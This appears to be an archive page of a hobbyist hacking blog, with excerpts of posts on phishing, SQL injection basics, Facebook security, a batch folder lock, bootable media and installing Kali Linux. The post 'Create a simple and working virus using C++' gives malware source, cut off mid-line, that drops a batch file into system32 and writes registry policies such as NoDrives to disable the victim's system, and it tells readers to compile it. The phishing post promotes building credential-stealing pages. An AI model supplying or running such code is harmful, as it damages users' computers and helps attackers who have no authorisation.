Posts

Showing posts from January, 2018

What is Phising? Learn to Create a Phishing page

Image
Now a days, Hacking is fantasy of every newbies. Hacking is not a bed roses , you will need good skill and practice in order to hack anything. Newbies downloads several software and spoil their several hours but at last they got nothing. They think they can hack just using a free and easily available open software. No way.. If you want to be a successful hacker you need to learn basic techniques first. Phishing is one of the most useful techniques for hacking. Note: ONLY FOR EDUCATIONAL PURPOSE What is Phishing?   Phishing is the process of setting up a fake website or webpage that look like original webpage . Attackers frequently employ this method to steal usernames and passwords. Most frequently, the process works as follows: A user clicks on a bad link to a phishing site. Believing they are viewing the intended web page, they enter their login credentials to access the web service. There’s just one problem. The user, who is really the attacker’s victim, actually

Create a simple and working virus using C++

Image
Creating virus may be funful for someone. this post is actually for them who want to create a virus by self. Before going to start i want to let you know that for creating virus you must have a c++ ccompiler except Turbo C++ . If you don't have any download Dev C++ from here or you can download CodeBlocks also Now Let's start copy this code in your C++ compiler. May be there are some syntax mistake due to line break. Please correct it. Now Compile and build an .exe file. #include<windows.h> # include <fstream.h> #include<iostream.h> #include<string.h> #include<conio.h> int main() { ofstream write("C:\\WINDOWS\\system32\\HackingStar.bat"); /*opening or creating new file with .bat extension*/ write<<"REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n"; write<<"REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Window\\

Basic concept of SQL injection

Image
Website Hacking is dream of every new hacker and SQL injection is one of the most favourite hacking attack of a hacker. Today we are going to learn some basic concept of SQL injection >> Section 1 – SQL Injection (Basics):- I have to try my best to explain the meaning of SQL Injection and how it works. What is SQL Injection? Basically SQL Injections or simply called Structured Query Language Injection is a technique that exploits the loop hole in the database layer of the application. This happens when user mistakenly or purposely(hackers) enters the special escape characters into the username password authentication form or in URL of the website. Its basically the coding standard loop hole. Most website owners doesn't have proper knowledge of secure coding standards and that results into the vulnerable websites. For better understanding, suppose you opened a website and went to his Sign in or log in page. Now in username field you have

How to Secure Your Facebook Account

Image
    Aj ke samay me sayad hi koi aisa ho jisne facebook ka naam nahi suna ho. Lakho karodo log facebook se registered hai sayad ap v unme se ek ho. Agar aisa hai to ap har din ek na ek baar facebook jaroor open karty honge. chahe fir wo apne mobile se ya laptop se ya kisi cyber cafe mai , kavi chori chipe apne office mai v. aur kai baar to ap apna account logout karna hi bhul jatey hai aur agar tab apka account kisi ke hath lag jaye to ho gaya satyanash.   Doston, jahan ek aur digitalization badh raha hai to wahi dusri taraf digital world se data ko churane wale hackers v badtey ja rahe to. Aise mein agar mai ye kahun ki apka facebook account safe nahi hai to sayad ye galat nahi hoga. To sawal ye uthta hai ki fir kaise hum apna facebook account ko hackero se bacha ke rakh saktey h. To aaiye hum apko batate h ki kaise ap apna account hack hone se bacha kar 90% safe kr skty h.   1. Strong Password   Aagar aap apne aap ko hackero se bachana chahtey h to ye apke liye sabse

How to Hack a Facebook Account

Image
Source: Google Hacking is term used for unauthorized access on anything. Whenever I tell someone  "I'm a hacker.", then first question i have to face " Can you hack a facebook account for me?" with a emotional reason like my GF is cheating me...or this and that I deny every time. it doesn't mean that I don't wanna hack a facebook account but the actual reason is hacking a account is not like khul ja sim sim and account will be hacked. No hacker can hack a facebook account with just a name or username. Then, why I am writing this post? Well, the purpose of writing is post is simply to let you know what actually hacking is? , just to open clear your existing wrong ideas about hacking. I hope this post will very beneficial for you. What actually Hacking is?   Hacking can be defined as getting unauthorized access to data in a system or computer.It doesn't only mean that you can access someone's account without password if you kno

Mi Max 3 Release date, Price and specification leaked

Image
Xiomi MI source: Google Hello Readers, We love our smartphone a lot.  Everyone wants latest smartphones with best features in their hand.  MI is most popular brand of smartphone among users due to its cheap price and advance features.  MI phones come with own OS MIUI together with android which is highly customisable.  It also comes with a long lasting battery.  Ultimately MI phones is the best option for users. Now Days,  After being MI MAX 2 and A1 as most selling smartphone.  Xiomi planning for launching new smartphone MI MAX 3 with all latest smartphone features at very low price.  If you are planning to buy a new smartphone please wait sometime for MAX 3.  SPECIFICATION . If we talk about features it'll come with 6.99 inch display, 6GB RAM and 128 internal storage along with long lasting 5500 mAh li-po non removable battery.  For photography phone will be equipped with 12 MP rear camera and 5 mp selfie camera.  According to various sources it is expected th

How to create own folder lock sofware

Image
Privacy is one of the most things that everyone need. In various situations we need to protect our files and folders with a password and we have to download a folder lock software for that. But,  now we can create our own folder lock very easily which is easy to use and occupy only few KBs. For this no any prerequisite technical knowledge required just follow this post quickly and get your job done ;) Follow these steps carefully and your awesome and compact folder lock is ready to use STEP 1. First of all open notepad. For this press windows+R and type notepad. Now hit enter to open notepad  STEP 2. Now just copy this code and paste to your notepad  cls  @ECHO OFF  title Folder Secure  if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK  if NOT EXIST Secure goto MDLOCKER  :CONFIRM  echo Are you sure you want to lock the folder(Y/N)  set/p "cho=>"  if %cho%==Y goto LOCK  if %cho%==y goto LOCK  if %cho%==n goto END  i

How to Make a Bootable DVD using PowerIso

Image
We encounter various situation when our OS fails to load or get corrupted and we need to reinstall a OS in order to perform our task. But purchasing a OS DVD is costly. So, the best way is to create a bootable media. In this post we will cover "how to make a bootable DVD" . There  are various tools available for this purpose but PowerIso is best solution for this purpose. As setting up PowerIso and making a bootable media is very easy from this tools. You can purchase it for around $25 but no need of that you can also do your work with free version. So, Lets Start 1. Dowload PowerIso from official site 2. Install and open PowerIso 3. Now Click on Open 4. Select Your ISO File for which you want to create bootable media 5. Click on Burn to start burning process 6. Now set the burning speed to 4X ( necessary ) 7. Hit on Burn button and wait... Finally you finished writing into DVD. Your bootable DVD is ready now you can install your OS to you

How to Dual Boot Kali Linux In Easy Steps

Image
Kali Linux is most popular OS among hackers weather they are noob or pro because of easy to use and several hacking and pan testing tool is pre-installed. If you are also willing to install kali in your PC or laptop, then you are at right place. Follow these steps carefully for successful installation. In this post we will also cover the basic problems occur while and after installation Requirements: Minimum 8 GB of HDD space to install Kali Linux For i386 or amd64 architecture, a minimum of 512 MB RAM (1024 MB RAM recommended) An ISO available at Kali Linux  site  A pendrive of 4/8/16/32 GB If have all the resource listed above then congo you can go ahead. PART 1: Creating a bootable Media   Note: Please skip to part 2 if you have already a bootable pendrive for Kali Linux 1. First of all you have to download ISO image of Kali Linux. You can download   for free at Kali Linux download page. 2. Now download PowerIso from here. 3. Open PowerIso and click continu